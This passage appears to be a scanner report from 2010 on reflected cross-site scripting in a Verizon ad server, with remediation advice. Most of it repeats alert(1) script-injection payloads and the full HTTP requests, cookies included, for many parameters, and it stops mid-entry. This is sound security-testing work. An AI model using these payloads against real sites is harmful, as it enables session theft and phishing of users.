Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b439"><script>alert(1)</script>14a07652aec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net8b439"><script>alert(1)</script>14a07652aec/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 359 Content-Type: text/html Cache-Control: private Content-Length: 359
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce74"><script>alert(1)</script>92b0fb76a8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage2ce74"><script>alert(1)</script>92b0fb76a8b/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:23 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53b64"><script>alert(1)</script>22bd36ebe57 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top53b64"><script>alert(1)</script>22bd36ebe57?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 352 Content-Type: text/html Cache-Control: private Content-Length: 352
The value of the audio_conf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbd15"><script>alert(1)</script>e9b1c6ac9bf was submitted in the audio_conf parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=fbd15"><script>alert(1)</script>e9b1c6ac9bf&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:48 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the bbaw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b04e9"><script>alert(1)</script>88b43b9e841 was submitted in the bbaw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=b04e9"><script>alert(1)</script>88b43b9e841&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:58 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the connex request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95f66"><script>alert(1)</script>944d611ec25 was submitted in the connex parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=95f66"><script>alert(1)</script>944d611ec25&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:08 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the fiostvown request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc55a"><script>alert(1)</script>061e019d33 was submitted in the fiostvown parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=dc55a"><script>alert(1)</script>061e019d33&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1392 Content-Type: text/html Cache-Control: private Content-Length: 1392
The value of the fiosvoice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12655"><script>alert(1)</script>19403df38df was submitted in the fiosvoice parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=12655"><script>alert(1)</script>19403df38df&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:19 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2d52"><script>alert(1)</script>08e01549957 was submitted in the msp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=c2d52"><script>alert(1)</script>08e01549957&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:28 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1394 Content-Type: text/html Cache-Control: private Content-Length: 1394
1.10. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 198e7"><script>alert(1)</script>2bc9a424ec6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&198e7"><script>alert(1)</script>2bc9a424ec6=1 HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:14:07 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1402 Content-Type: text/html Cache-Control: private Content-Length: 1402
The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4037b"><script>alert(1)</script>d2c2ef8cfb7 was submitted in the npa parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=4037b"><script>alert(1)</script>d2c2ef8cfb7&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:23 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14c09"><script>alert(1)</script>9bf55b7778c was submitted in the nxx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=14c09"><script>alert(1)</script>9bf55b7778c&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:26 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd800"><script>alert(1)</script>1fbf2886a4d was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=dd800"><script>alert(1)</script>1fbf2886a4d&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:45 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd4b8"><script>alert(1)</script>f43c1bd4bbd was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=bd4b8"><script>alert(1)</script>f43c1bd4bbd&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:13:14 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1396 Content-Type: text/html Cache-Control: private Content-Length: 1396
The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770a4"><script>alert(1)</script>1e832059d7 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/2790@Top?popip=174.122.23.218&popindicator=&popcity=770a4"><script>alert(1)</script>1e832059d7&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1 Host: oascentral.verizononline.com Proxy-Connection: keep-alive Referer: http://surround.verizon.net/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT; NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; RMFD=011PJccjO10erias
Response
HTTP/1.1 200 OK Date: Sat, 20 Nov 2010 02:12:54 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Cteonnt-Length: 1392 Content-Type: text/html Cache-Control: private Content-Length: 1392
The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7caf7"><script>alert(1)</script>50a54869684 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.
